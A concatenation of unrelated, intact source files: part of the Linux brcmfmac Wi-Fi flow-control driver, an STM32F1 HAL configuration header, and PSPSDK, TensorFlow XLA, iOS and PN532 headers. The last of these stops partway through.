		while ((fws->fifo_credit[fifo]) || ((!fws->bcmc_credit_check) &&
						    (fifo == BRCMF_FWS_FIFO_BCMC))) {
			skb = brcmf_fws_deq(fws, fifo);
			if (!skb)
				break;
			fws->fifo_credit[fifo]--;
			if (brcmf_fws_commit_skb(fws, fifo, skb))
				break;
			if (fws->bus_flow_blocked)
				break;
		}
		/* BE fifo out of credits: try borrowing from other ACs */
		if ((fifo == BRCMF_FWS_FIFO_AC_BE) &&
		    (fws->fifo_credit[fifo] == 0) &&
		    (!fws->bus_flow_blocked)) {
			while (brcmf_fws_borrow_credit(fws) == 0) {
				skb = brcmf_fws_deq(fws, fifo);
				if (!skb) {
					brcmf_fws_return_credits(fws, fifo, 1);
					break;
				}
				if (brcmf_fws_commit_skb(fws, fifo, skb))
					break;
				if (fws->bus_flow_blocked)
					break;
			}
		}
	}
	brcmf_fws_unlock(fws);
}

#ifdef DEBUG
/* debugfs read handler: dump all fws statistics counters */
static int brcmf_debugfs_fws_stats_read(struct seq_file *seq, void *data)
{
	struct brcmf_bus *bus_if = dev_get_drvdata(seq->private);
	struct brcmf_fws_stats *fwstats = &bus_if->drvr->fws->stats;

	seq_printf(seq,
		   "header_pulls: %u\n"
		   "header_only_pkt: %u\n"
		   "tlv_parse_failed: %u\n"
		   "tlv_invalid_type: %u\n"
		   "mac_update_fails: %u\n"
		   "ps_update_fails: %u\n"
		   "if_update_fails: %u\n"
		   "pkt2bus: %u\n"
		   "generic_error: %u\n"
		   "rollback_success: %u\n"
		   "rollback_failed: %u\n"
		   "delayq_full: %u\n"
		   "supprq_full: %u\n"
		   "txs_indicate: %u\n"
		   "txs_discard: %u\n"
		   "txs_suppr_core: %u\n"
		   "txs_suppr_ps: %u\n"
		   "txs_tossed: %u\n"
		   "txs_host_tossed: %u\n"
		   "bus_flow_block: %u\n"
		   "fws_flow_block: %u\n"
		   "send_pkts: BK:%u BE:%u VO:%u VI:%u BCMC:%u\n"
		   "requested_sent: BK:%u BE:%u VO:%u VI:%u BCMC:%u\n",
		   fwstats->header_pulls,
		   fwstats->header_only_pkt,
		   fwstats->tlv_parse_failed,
		   fwstats->tlv_invalid_type,
		   fwstats->mac_update_failed,
		   fwstats->mac_ps_update_failed,
		   fwstats->if_update_failed,
		   fwstats->pkt2bus,
		   fwstats->generic_error,
		   fwstats->rollback_success,
		   fwstats->rollback_failed,
		   fwstats->delayq_full_error,
		   fwstats->supprq_full_error,
		   fwstats->txs_indicate,
		   fwstats->txs_discard,
		   fwstats->txs_supp_core,
		   fwstats->txs_supp_ps,
		   fwstats->txs_tossed,
		   fwstats->txs_host_tossed,
		   fwstats->bus_flow_block,
		   fwstats->fws_flow_block,
		   fwstats->send_pkts[0], fwstats->send_pkts[1],
		   fwstats->send_pkts[2], fwstats->send_pkts[3],
		   fwstats->send_pkts[4],
		   fwstats->requested_sent[0], fwstats->requested_sent[1],
		   fwstats->requested_sent[2], fwstats->requested_sent[3],
		   fwstats->requested_sent[4]);

	return 0;
}
#else
/* stub when debugfs support is compiled out */
static int brcmf_debugfs_fws_stats_read(struct seq_file *seq, void *data)
{
	return 0;
}
#endif

/* Allocate and initialize the firmware-signalling state: workqueue, event
 * handlers, firmware iovars (tlv signalling, host reorder, seq-reuse mode),
 * hanger and default mac descriptor. Returns 0 on success; on failure all
 * partial state is torn down via brcmf_fws_deinit().
 */
int brcmf_fws_init(struct brcmf_pub *drvr)
{
	struct brcmf_fws_info *fws;
	struct brcmf_if *ifp;
	u32 tlv = BRCMF_FWS_FLAGS_RSSI_SIGNALS;
	int rc;
	u32 mode;

	drvr->fws = kzalloc(sizeof(*(drvr->fws)), GFP_KERNEL);
	if (!drvr->fws) {
		rc = -ENOMEM;
		goto fail;
	}

	fws = drvr->fws;
	spin_lock_init(&fws->spinlock);

	/* set linkage back */
	fws->drvr = drvr;
	fws->fcmode = fcmode;

	/* skip queueing entirely when neither the bus nor the module
	 * parameter requires flow control
	 */
	if ((drvr->bus_if->always_use_fws_queue == false) &&
	    (fcmode == BRCMF_FWS_FCMODE_NONE)) {
		fws->avoid_queueing = true;
		brcmf_dbg(INFO, "FWS queueing will be avoided\n");
		return 0;
	}

	fws->fws_wq = create_singlethread_workqueue("brcmf_fws_wq");
	if (fws->fws_wq == NULL) {
		brcmf_err("workqueue creation failed\n");
		rc = -EBADF;
		goto fail;
	}
	INIT_WORK(&fws->fws_dequeue_work, brcmf_fws_dequeue_worker);

	/* enable firmware signalling if fcmode active */
	if (fws->fcmode != BRCMF_FWS_FCMODE_NONE)
		tlv |= BRCMF_FWS_FLAGS_XONXOFF_SIGNALS |
		       BRCMF_FWS_FLAGS_CREDIT_STATUS_SIGNALS |
		       BRCMF_FWS_FLAGS_HOST_PROPTXSTATUS_ACTIVE |
		       BRCMF_FWS_FLAGS_HOST_RXREORDER_ACTIVE;

	rc = brcmf_fweh_register(drvr, BRCMF_E_FIFO_CREDIT_MAP,
				 brcmf_fws_notify_credit_map);
	if (rc < 0) {
		brcmf_err("register credit map handler failed\n");
		goto fail;
	}
	rc = brcmf_fweh_register(drvr, BRCMF_E_BCMC_CREDIT_SUPPORT,
				 brcmf_fws_notify_bcmc_credit_support);
	if (rc < 0) {
		brcmf_err("register bcmc credit handler failed\n");
		brcmf_fweh_unregister(drvr, BRCMF_E_FIFO_CREDIT_MAP);
		goto fail;
	}

	/* Setting the iovar may fail if feature is unsupported
	 * so leave the rc as is so driver initialization can
	 * continue. Set mode back to none indicating not enabled.
	 */
	fws->fw_signals = true;
	ifp = brcmf_get_ifp(drvr, 0);
	if (brcmf_fil_iovar_int_set(ifp, "tlv", tlv)) {
		brcmf_err("failed to set bdcv2 tlv signaling\n");
		fws->fcmode = BRCMF_FWS_FCMODE_NONE;
		fws->fw_signals = false;
	}

	if (brcmf_fil_iovar_int_set(ifp, "ampdu_hostreorder", 1))
		brcmf_dbg(INFO, "enabling AMPDU host-reorder failed\n");

	/* Enable seq number reuse, if supported */
	if (brcmf_fil_iovar_int_get(ifp, "wlfc_mode", &mode) == 0) {
		if (BRCMF_FWS_MODE_GET_REUSESEQ(mode)) {
			mode = 0;
			BRCMF_FWS_MODE_SET_REUSESEQ(mode, 1);
			if (brcmf_fil_iovar_int_set(ifp,
						    "wlfc_mode", mode) == 0) {
				BRCMF_FWS_MODE_SET_REUSESEQ(fws->mode, 1);
			}
		}
	}

	brcmf_fws_hanger_init(&fws->hanger);
	brcmf_fws_macdesc_init(&fws->desc.other, NULL, 0);
	brcmf_fws_macdesc_set_name(fws, &fws->desc.other);
	brcmu_pktq_init(&fws->desc.other.psq, BRCMF_FWS_PSQ_PREC_COUNT,
			BRCMF_FWS_PSQ_LEN);

	/* create debugfs file for statistics */
	brcmf_debugfs_add_entry(drvr, "fws_stats",
				brcmf_debugfs_fws_stats_read);

	brcmf_dbg(INFO, "%s bdcv2 tlv signaling [%x]\n",
		  fws->fw_signals ? "enabled" : "disabled", tlv);
	return 0;

fail:
	brcmf_fws_deinit(drvr);
	return rc;
}

/* Tear down firmware-signalling state: stop the workqueue, clean up all
 * queued packets under the lock, and free the top structure.
 */
void brcmf_fws_deinit(struct brcmf_pub *drvr)
{
	struct brcmf_fws_info *fws = drvr->fws;

	if (!fws)
		return;

	if (drvr->fws->fws_wq)
		destroy_workqueue(drvr->fws->fws_wq);

	/* cleanup */
	brcmf_fws_lock(fws);
	brcmf_fws_cleanup(fws, -1);
	drvr->fws = NULL;
	brcmf_fws_unlock(fws);

	/* free top structure */
	kfree(fws);
}

/* Flow control is active once the firmware announced its credit map and a
 * flow-control mode is configured.
 */
bool brcmf_fws_fc_active(struct brcmf_fws_info *fws)
{
	if (!fws->creditmap_received)
		return false;

	return fws->fcmode != BRCMF_FWS_FCMODE_NONE;
}

/* Bus-level transmit failure: free TIM (signal-only) packets outright,
 * otherwise toss the packet through the txstatus path so counters and
 * credits stay consistent.
 */
void brcmf_fws_bustxfail(struct brcmf_fws_info *fws, struct sk_buff *skb)
{
	u32 hslot;

	if (brcmf_skbcb(skb)->state == BRCMF_FWS_SKBSTATE_TIM) {
		brcmu_pkt_buf_free_skb(skb);
		return;
	}
	brcmf_fws_lock(fws);
	hslot = brcmf_skb_htod_tag_get_field(skb, HSLOT);
	brcmf_fws_txs_process(fws, BRCMF_FWS_TXSTATUS_HOST_TOSSED, hslot,
			      0, 0);
	brcmf_fws_unlock(fws);
}

/* Record the bus flow-blocked state; when the bus unblocks, kick the
 * dequeue worker to resume draining.
 */
void brcmf_fws_bus_blocked(struct brcmf_pub *drvr, bool flow_blocked)
{
	struct brcmf_fws_info *fws = drvr->fws;

	fws->bus_flow_blocked = flow_blocked;
	if (!flow_blocked)
		brcmf_fws_schedule_deq(fws);
	else
		fws->stats.bus_flow_block++;
}
/** ****************************************************************************** * @file stm32f1xx_hal_conf.h * @brief HAL configuration file. ****************************************************************************** * @attention * * <h2><center>&copy; COPYRIGHT(c) 2019 STMicroelectronics</center></h2> * * Redistribution and use in source and binary forms, with or without modification, * are permitted provided that the following conditions are met: * 1. Redistributions of source code must retain the above copyright notice, * this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright notice, * this list of conditions and the following disclaimer in the documentation * and/or other materials provided with the distribution. * 3. Neither the name of STMicroelectronics nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
 *
 ******************************************************************************
 */

/* Define to prevent recursive inclusion -------------------------------------*/
#ifndef __STM32F1xx_HAL_CONF_H
#define __STM32F1xx_HAL_CONF_H

#ifdef __cplusplus
extern "C" {
#endif

/* Exported types ------------------------------------------------------------*/
/* Exported constants --------------------------------------------------------*/

/* ########################## Module Selection ############################## */
/**
 * @brief This is the list of modules to be used in the HAL driver
 */
#define HAL_MODULE_ENABLED
/*#define HAL_ADC_MODULE_ENABLED */
/*#define HAL_CRYP_MODULE_ENABLED */
/*#define HAL_CAN_MODULE_ENABLED */
/*#define HAL_CEC_MODULE_ENABLED */
/*#define HAL_CORTEX_MODULE_ENABLED */
#define HAL_CRC_MODULE_ENABLED
/*#define HAL_DAC_MODULE_ENABLED */
/*#define HAL_DMA_MODULE_ENABLED */
/*#define HAL_ETH_MODULE_ENABLED */
/*#define HAL_FLASH_MODULE_ENABLED */
#define HAL_GPIO_MODULE_ENABLED
/*#define HAL_I2C_MODULE_ENABLED */
/*#define HAL_I2S_MODULE_ENABLED */
/*#define HAL_IRDA_MODULE_ENABLED */
#define HAL_IWDG_MODULE_ENABLED
/*#define HAL_NOR_MODULE_ENABLED */
/*#define HAL_NAND_MODULE_ENABLED */
/*#define HAL_PCCARD_MODULE_ENABLED */
/*#define HAL_PCD_MODULE_ENABLED */
/*#define HAL_HCD_MODULE_ENABLED */
/*#define HAL_PWR_MODULE_ENABLED */
/*#define HAL_RCC_MODULE_ENABLED */
#define HAL_RTC_MODULE_ENABLED
/*#define HAL_SD_MODULE_ENABLED */
/*#define HAL_MMC_MODULE_ENABLED */
/*#define HAL_SDRAM_MODULE_ENABLED */
/*#define HAL_SMARTCARD_MODULE_ENABLED */
#define HAL_SPI_MODULE_ENABLED
/*#define HAL_SRAM_MODULE_ENABLED */
#define HAL_TIM_MODULE_ENABLED
#define HAL_UART_MODULE_ENABLED
/*#define HAL_USART_MODULE_ENABLED */
/*#define HAL_WWDG_MODULE_ENABLED */
/*#define HAL_EXTI_MODULE_ENABLED */
/* Core modules always enabled for this project.
 * NOTE(review): HAL_GPIO_MODULE_ENABLED is defined twice (also above) —
 * harmless since object-like macro redefinition with an identical body is
 * allowed, but the duplicate could be removed.
 */
#define HAL_CORTEX_MODULE_ENABLED
#define HAL_DMA_MODULE_ENABLED
#define HAL_FLASH_MODULE_ENABLED
#define HAL_GPIO_MODULE_ENABLED
#define HAL_PWR_MODULE_ENABLED
#define HAL_RCC_MODULE_ENABLED

/* ########################## Oscillator Values adaptation ####################*/
/**
 * @brief Adjust the value of External High Speed oscillator (HSE) used in your application.
 *        This value is used by the RCC HAL module to compute the system frequency
 *        (when HSE is used as system clock source, directly or through the PLL).
 */
#if !defined  (HSE_VALUE)
#define HSE_VALUE    ((uint32_t)8000000) /*!< Value of the External oscillator in Hz */
#endif /* HSE_VALUE */

#if !defined  (HSE_STARTUP_TIMEOUT)
#define HSE_STARTUP_TIMEOUT    ((uint32_t)100)   /*!< Time out for HSE start up, in ms */
#endif /* HSE_STARTUP_TIMEOUT */

/**
 * @brief Internal High Speed oscillator (HSI) value.
 *        This value is used by the RCC HAL module to compute the system frequency
 *        (when HSI is used as system clock source, directly or through the PLL).
 */
#if !defined  (HSI_VALUE)
#define HSI_VALUE    ((uint32_t)8000000) /*!< Value of the Internal oscillator in Hz*/
#endif /* HSI_VALUE */

/**
 * @brief Internal Low Speed oscillator (LSI) value.
 */
#if !defined  (LSI_VALUE)
#define LSI_VALUE               40000U    /*!< LSI Typical Value in Hz */
#endif /* LSI_VALUE */
/*!< Value of the Internal Low Speed oscillator in Hz
     The real value may vary depending on the variations
     in voltage and temperature. */

/**
 * @brief External Low Speed oscillator (LSE) value.
 *        This value is used by the UART, RTC HAL module to compute the system frequency
 */
#if !defined  (LSE_VALUE)
#define LSE_VALUE    ((uint32_t)32768) /*!< Value of the External oscillator in Hz*/
#endif /* LSE_VALUE */

#if !defined  (LSE_STARTUP_TIMEOUT)
#define LSE_STARTUP_TIMEOUT    ((uint32_t)5000)   /*!< Time out for LSE start up, in ms */
#endif /* LSE_STARTUP_TIMEOUT */

/* Tip: To avoid modifying this file each time you need to use different HSE,
   === you can define the HSE value in your toolchain compiler preprocessor. */

/* ########################### System Configuration ######################### */
/**
 * @brief This is the HAL system configuration section
 */
#define  VDD_VALUE                    ((uint32_t)3300) /*!< Value of VDD in mv */
#define  TICK_INT_PRIORITY            ((uint32_t)0)    /*!< tick interrupt priority (lowest by default) */
#define  USE_RTOS                     0
#define  PREFETCH_ENABLE              1

/* ########################## Assert Selection ############################## */
/**
 * @brief Uncomment the line below to expanse the "assert_param" macro in the
 *        HAL drivers code
 */
/* #define USE_FULL_ASSERT    1U */

/* ################## Ethernet peripheral configuration ##################### */

/* Section 1 : Ethernet peripheral configuration */

/* MAC ADDRESS: MAC_ADDR0:MAC_ADDR1:MAC_ADDR2:MAC_ADDR3:MAC_ADDR4:MAC_ADDR5 */
#define MAC_ADDR0   2
#define MAC_ADDR1   0
#define MAC_ADDR2   0
#define MAC_ADDR3   0
#define MAC_ADDR4   0
#define MAC_ADDR5   0

/* Definition of the Ethernet driver buffers size and count */
#define ETH_RX_BUF_SIZE                ETH_MAX_PACKET_SIZE /* buffer size for receive               */
#define ETH_TX_BUF_SIZE                ETH_MAX_PACKET_SIZE /* buffer size for transmit              */
#define ETH_RXBUFNB                    ((uint32_t)8)       /* 4 Rx buffers of size ETH_RX_BUF_SIZE  */
#define ETH_TXBUFNB                    ((uint32_t)4)       /* 4 Tx buffers of size ETH_TX_BUF_SIZE  */

/* Section 2: PHY configuration section */

/* DP83848_PHY_ADDRESS Address*/
#define DP83848_PHY_ADDRESS           0x01U
/* PHY Reset delay these values are based on a 1 ms Systick interrupt*/
#define PHY_RESET_DELAY                 ((uint32_t)0x000000FF)
/* PHY Configuration delay */
#define PHY_CONFIG_DELAY                ((uint32_t)0x00000FFF)

#define PHY_READ_TO                     ((uint32_t)0x0000FFFF)
#define PHY_WRITE_TO                    ((uint32_t)0x0000FFFF)

/* Section 3: Common PHY Registers */

#define PHY_BCR                         ((uint16_t)0x00)    /*!< Transceiver Basic Control Register   */
#define PHY_BSR                         ((uint16_t)0x01)    /*!< Transceiver Basic Status Register    */

#define PHY_RESET                       ((uint16_t)0x8000)  /*!< PHY Reset */
#define PHY_LOOPBACK                    ((uint16_t)0x4000)  /*!< Select loop-back mode */
#define PHY_FULLDUPLEX_100M             ((uint16_t)0x2100)  /*!< Set the full-duplex mode at 100 Mb/s */
#define PHY_HALFDUPLEX_100M             ((uint16_t)0x2000)  /*!< Set the half-duplex mode at 100 Mb/s */
#define PHY_FULLDUPLEX_10M              ((uint16_t)0x0100)  /*!< Set the full-duplex mode at 10 Mb/s  */
#define PHY_HALFDUPLEX_10M              ((uint16_t)0x0000)  /*!< Set the half-duplex mode at 10 Mb/s  */
#define PHY_AUTONEGOTIATION             ((uint16_t)0x1000)  /*!< Enable auto-negotiation function     */
#define PHY_RESTART_AUTONEGOTIATION     ((uint16_t)0x0200)  /*!< Restart auto-negotiation function    */
#define PHY_POWERDOWN                   ((uint16_t)0x0800)  /*!< Select the power down mode           */
#define PHY_ISOLATE                     ((uint16_t)0x0400)  /*!< Isolate PHY from MII                 */

#define PHY_AUTONEGO_COMPLETE           ((uint16_t)0x0020)  /*!< Auto-Negotiation process completed   */
#define PHY_LINKED_STATUS               ((uint16_t)0x0004)  /*!< Valid link established               */
#define PHY_JABBER_DETECTION            ((uint16_t)0x0002)  /*!< Jabber condition detected            */

/* Section 4: Extended PHY Registers */

#define PHY_SR                          ((uint16_t)0x10U)    /*!< PHY status register Offset */

#define PHY_SPEED_STATUS                ((uint16_t)0x0002U)  /*!< PHY Speed mask */
#define PHY_DUPLEX_STATUS               ((uint16_t)0x0004U)  /*!< PHY Duplex mask */

/* Includes ------------------------------------------------------------------*/
/**
 * @brief Include module's header file
 */

#ifdef HAL_RCC_MODULE_ENABLED
#include "stm32f1xx_hal_rcc.h"
#endif /* HAL_RCC_MODULE_ENABLED */

#ifdef HAL_EXTI_MODULE_ENABLED
#include "stm32f1xx_hal_exti.h"
#endif /* HAL_EXTI_MODULE_ENABLED */

#ifdef HAL_GPIO_MODULE_ENABLED
#include "stm32f1xx_hal_gpio.h"
#endif /* HAL_GPIO_MODULE_ENABLED */

#ifdef HAL_DMA_MODULE_ENABLED
#include "stm32f1xx_hal_dma.h"
#endif /* HAL_DMA_MODULE_ENABLED */

#ifdef HAL_ETH_MODULE_ENABLED
#include "stm32f1xx_hal_eth.h"
#endif /* HAL_ETH_MODULE_ENABLED */

#ifdef HAL_CAN_MODULE_ENABLED
#include "stm32f1xx_hal_can.h"
#endif /* HAL_CAN_MODULE_ENABLED */

#ifdef HAL_CEC_MODULE_ENABLED
#include "stm32f1xx_hal_cec.h"
#endif /* HAL_CEC_MODULE_ENABLED */

#ifdef HAL_CORTEX_MODULE_ENABLED
#include "stm32f1xx_hal_cortex.h"
#endif /* HAL_CORTEX_MODULE_ENABLED */

#ifdef HAL_ADC_MODULE_ENABLED
#include "stm32f1xx_hal_adc.h"
#endif /* HAL_ADC_MODULE_ENABLED */

#ifdef HAL_CRC_MODULE_ENABLED
#include "stm32f1xx_hal_crc.h"
#endif /* HAL_CRC_MODULE_ENABLED */

#ifdef HAL_DAC_MODULE_ENABLED
#include "stm32f1xx_hal_dac.h"
#endif /* HAL_DAC_MODULE_ENABLED */

#ifdef HAL_FLASH_MODULE_ENABLED
#include "stm32f1xx_hal_flash.h"
#endif /* HAL_FLASH_MODULE_ENABLED */

#ifdef HAL_SRAM_MODULE_ENABLED
#include "stm32f1xx_hal_sram.h"
#endif /* HAL_SRAM_MODULE_ENABLED */

#ifdef HAL_NOR_MODULE_ENABLED
#include "stm32f1xx_hal_nor.h"
#endif /* HAL_NOR_MODULE_ENABLED */

#ifdef HAL_I2C_MODULE_ENABLED
#include "stm32f1xx_hal_i2c.h"
#endif /* HAL_I2C_MODULE_ENABLED */

#ifdef HAL_I2S_MODULE_ENABLED
#include "stm32f1xx_hal_i2s.h"
#endif /* HAL_I2S_MODULE_ENABLED */

#ifdef HAL_IWDG_MODULE_ENABLED
#include "stm32f1xx_hal_iwdg.h"
#endif /* HAL_IWDG_MODULE_ENABLED */

#ifdef HAL_PWR_MODULE_ENABLED
#include "stm32f1xx_hal_pwr.h"
#endif /* HAL_PWR_MODULE_ENABLED */

#ifdef HAL_RTC_MODULE_ENABLED
#include "stm32f1xx_hal_rtc.h"
#endif /* HAL_RTC_MODULE_ENABLED */

#ifdef HAL_PCCARD_MODULE_ENABLED
#include "stm32f1xx_hal_pccard.h"
#endif /* HAL_PCCARD_MODULE_ENABLED */

#ifdef HAL_SD_MODULE_ENABLED
#include "stm32f1xx_hal_sd.h"
#endif /* HAL_SD_MODULE_ENABLED */

#ifdef HAL_MMC_MODULE_ENABLED
#include "stm32f1xx_hal_mmc.h"
#endif /* HAL_MMC_MODULE_ENABLED */

#ifdef HAL_NAND_MODULE_ENABLED
#include "stm32f1xx_hal_nand.h"
#endif /* HAL_NAND_MODULE_ENABLED */

#ifdef HAL_SPI_MODULE_ENABLED
#include "stm32f1xx_hal_spi.h"
#endif /* HAL_SPI_MODULE_ENABLED */

#ifdef HAL_TIM_MODULE_ENABLED
#include "stm32f1xx_hal_tim.h"
#endif /* HAL_TIM_MODULE_ENABLED */

#ifdef HAL_UART_MODULE_ENABLED
#include "stm32f1xx_hal_uart.h"
#endif /* HAL_UART_MODULE_ENABLED */

#ifdef HAL_USART_MODULE_ENABLED
#include "stm32f1xx_hal_usart.h"
#endif /* HAL_USART_MODULE_ENABLED */

#ifdef HAL_IRDA_MODULE_ENABLED
#include "stm32f1xx_hal_irda.h"
#endif /* HAL_IRDA_MODULE_ENABLED */

#ifdef HAL_SMARTCARD_MODULE_ENABLED
#include "stm32f1xx_hal_smartcard.h"
#endif /* HAL_SMARTCARD_MODULE_ENABLED */

#ifdef HAL_WWDG_MODULE_ENABLED
#include "stm32f1xx_hal_wwdg.h"
#endif /* HAL_WWDG_MODULE_ENABLED */

#ifdef HAL_PCD_MODULE_ENABLED
#include "stm32f1xx_hal_pcd.h"
#endif /* HAL_PCD_MODULE_ENABLED */

#ifdef HAL_HCD_MODULE_ENABLED
#include "stm32f1xx_hal_hcd.h"
#endif /* HAL_HCD_MODULE_ENABLED */

/* Exported macro ------------------------------------------------------------*/
#ifdef  USE_FULL_ASSERT
/**
 * @brief  The assert_param macro is used for function's parameters check.
 * @param  expr: If expr is false, it calls assert_failed function
 *         which reports the name of the source file and the source
 *         line number of the call that failed.
 *         If expr is true, it returns no value.
 * @retval None
 */
#define assert_param(expr) ((expr) ? (void)0U : assert_failed((uint8_t *)__FILE__, __LINE__))
/* Exported functions ------------------------------------------------------- */
void assert_failed(uint8_t* file, uint32_t line);
#else
#define assert_param(expr) ((void)0U)
#endif /* USE_FULL_ASSERT */

#ifdef __cplusplus
}
#endif

#endif /* __STM32F1xx_HAL_CONF_H */

/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/
/*
 * PSP Software Development Kit - https://github.com/pspdev
 * -----------------------------------------------------------------------
 * Licensed under the BSD license, see LICENSE in PSPSDK root for details.
 *
 * psputility_modules.h - Load modules from user mode
 *
 * Copyright (c) 2008 David Perry <tias_dp@hotmail.com>
 *
 */
#ifndef __PSPUTILITY_MODULES_H__
#define __PSPUTILITY_MODULES_H__

#ifdef __cplusplus
extern "C" {
#endif

#include <psptypes.h>

/*
 * Module identifiers accepted by sceUtilityLoadModule() and
 * sceUtilityUnloadModule(). The high byte encodes the category:
 * 0x01xx network, 0x02xx USB, 0x03xx audio/video, 0x04xx-0x05xx NP,
 * 0x06xx IrDA.
 */

/* Net Modules */
#define PSP_MODULE_NET_COMMON     0x0100
#define PSP_MODULE_NET_ADHOC      0x0101
#define PSP_MODULE_NET_INET       0x0102
#define PSP_MODULE_NET_PARSEURI   0x0103
#define PSP_MODULE_NET_PARSEHTTP  0x0104
#define PSP_MODULE_NET_HTTP       0x0105
#define PSP_MODULE_NET_SSL        0x0106

/* USB Modules */
#define PSP_MODULE_USB_PSPCM      0x0200
#define PSP_MODULE_USB_MIC        0x0201
#define PSP_MODULE_USB_CAM        0x0202
#define PSP_MODULE_USB_GPS        0x0203

/* Audio/video Modules */
#define PSP_MODULE_AV_AVCODEC     0x0300
#define PSP_MODULE_AV_SASCORE     0x0301
#define PSP_MODULE_AV_ATRAC3PLUS  0x0302
#define PSP_MODULE_AV_MPEGBASE    0x0303
#define PSP_MODULE_AV_MP3         0x0304
#define PSP_MODULE_AV_VAUDIO      0x0305
#define PSP_MODULE_AV_AAC         0x0306
#define PSP_MODULE_AV_G729        0x0307

/* NP */
#define PSP_MODULE_NP_COMMON      0x0400
#define PSP_MODULE_NP_SERVICE     0x0401
#define PSP_MODULE_NP_MATCHING2   0x0402

#define PSP_MODULE_NP_DRM         0x0500

/* IrDA */
#define PSP_MODULE_IRDA           0x0600

/**
 * Load a module (PRX) from user mode.
 *
 * @param module - module to load (PSP_MODULE_xxx)
 *
 * @return 0 on success, < 0 on error
 */
int sceUtilityLoadModule(int module);

/**
 * Unload a module (PRX) from user mode.
 *
 * @param module - module to unload (PSP_MODULE_xxx)
 *
 * @return 0 on success, < 0 on error
 */
int sceUtilityUnloadModule(int module);

#ifdef __cplusplus
}
#endif

#endif
/* Copyright 2019 The TensorFlow Authors. All Rights Reserved.

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
==============================================================================*/

#ifndef TENSORFLOW_COMPILER_XLA_SERVICE_GPU_TARGET_UTIL_H_
#define TENSORFLOW_COMPILER_XLA_SERVICE_GPU_TARGET_UTIL_H_

#include <string>

#include "absl/strings/string_view.h"
#include "absl/types/span.h"
#include "llvm/ADT/StringRef.h"
#include "llvm/ADT/Triple.h"
#include "llvm/IR/IRBuilder.h"
#include "llvm/IR/Intrinsics.h"
#include "llvm/IR/Module.h"

namespace xla {
namespace gpu {

// Enumeration to get target specific intrinsics.
enum class TargetIntrinsicID {
  // Thread index within a block, per dimension.
  kThreadIdx = 0,
  kThreadIdy,
  kThreadIdz,
  // Block index within the grid, per dimension.
  kBlockIdx,
  kBlockIdy,
  kBlockIdz,
  // Block-level barrier/synchronization intrinsic.
  kBarrierId,
};

// Emits a call to the specified target intrinsic with the given operands.
// Overloaded intrinsics (for example, "minnum") must include a type
// in overloaded_types for each overloaded type. Typically, overloaded
// intrinsics have only a single overloaded type.
llvm::CallInst* EmitCallToTargetIntrinsic(
    TargetIntrinsicID intrinsic_id, absl::Span<llvm::Value* const> operands,
    absl::Span<llvm::Type* const> overloaded_types, llvm::IRBuilder<>* b);

// Annotate the kernel as GPU kernel according to the GPU target.
void AnnotateFunctionAsGpuKernel(llvm::Module* module, llvm::Function* func,
                                 llvm::IRBuilder<>* b);

}  // namespace gpu
}  // namespace xla

#endif  // TENSORFLOW_COMPILER_XLA_SERVICE_GPU_TARGET_UTIL_H_
/*
 * This header is generated by classdump-dyld 1.0
 * on Sunday, September 27, 2020 at 11:54:43 AM Mountain Standard Time
 * Operating System: Version 14.0 (Build 18A373)
 * Image Source: /System/Library/PrivateFrameworks/MessageSecurity.framework/MessageSecurity
 * classdump-dyld is licensed under GPLv3, Copyright © 2013-2016 by Elias Limneos.
 */

@class MSOID, NSData;

// Protocol for a CMS message object: exposes its content-type OID, raw data
// content, and an optionally nested (embedded) CMS message.
// NOTE(review): generated from a private framework dump — semantics of the
// individual properties are inferred from their names; verify against the
// framework before relying on them.
@protocol MSCMSMessage <MSMessage>
@property (readonly) MSOID * type;
@property (nonatomic,retain) NSData * dataContent;
@property (retain) id<MSCMSMessage> embeddedContent;
@property (retain) MSOID * contentType;
@required
-(MSOID *)contentType;
-(MSOID *)type;
-(void)setContentType:(id)arg1;
-(void)setDataContent:(id)arg1;
-(NSData *)dataContent;
-(void)setEmbeddedContent:(id)arg1;
-(id<MSCMSMessage>)embeddedContent;
@end
//
//  QJCTabBarController.h
//  singdemo
//
//  Created by MYMAc on 2018/7/21.
//  Copyright © 2018 ShangYu. All rights reserved.
//

#import <UIKit/UIKit.h>

// Custom tab bar controller; no public API beyond UITabBarController —
// configuration happens in the implementation file.
@interface QJCTabBarController : UITabBarController

@end
#ifndef __PN532_INTERFACE_H__
#define __PN532_INTERFACE_H__

#include <stdint.h>

/* PN532 frame layout constants (see the PN532 user manual). */
#define PN532_PREAMBLE              (0x00)
#define PN532_STARTCODE1            (0x00)
#define PN532_STARTCODE2            (0xFF)
#define PN532_POSTAMBLE             (0x00)

/* Frame direction identifiers. */
#define PN532_HOSTTOPN532           (0xD4)
#define PN532_PN532TOHOST           (0xD5)

#define PN532_ACK_WAIT_TIME         (10)  // ms, timeout of waiting for ACK

/* Error codes returned by the transport implementations. */
#define PN532_INVALID_ACK           (-1)
#define PN532_TIMEOUT               (-2)
#define PN532_INVALID_FRAME         (-3)
#define PN532_NO_SPACE              (-4)

// Reverse the bit order of byte b in place: swap nibbles, then bit pairs,
// then adjacent bits.
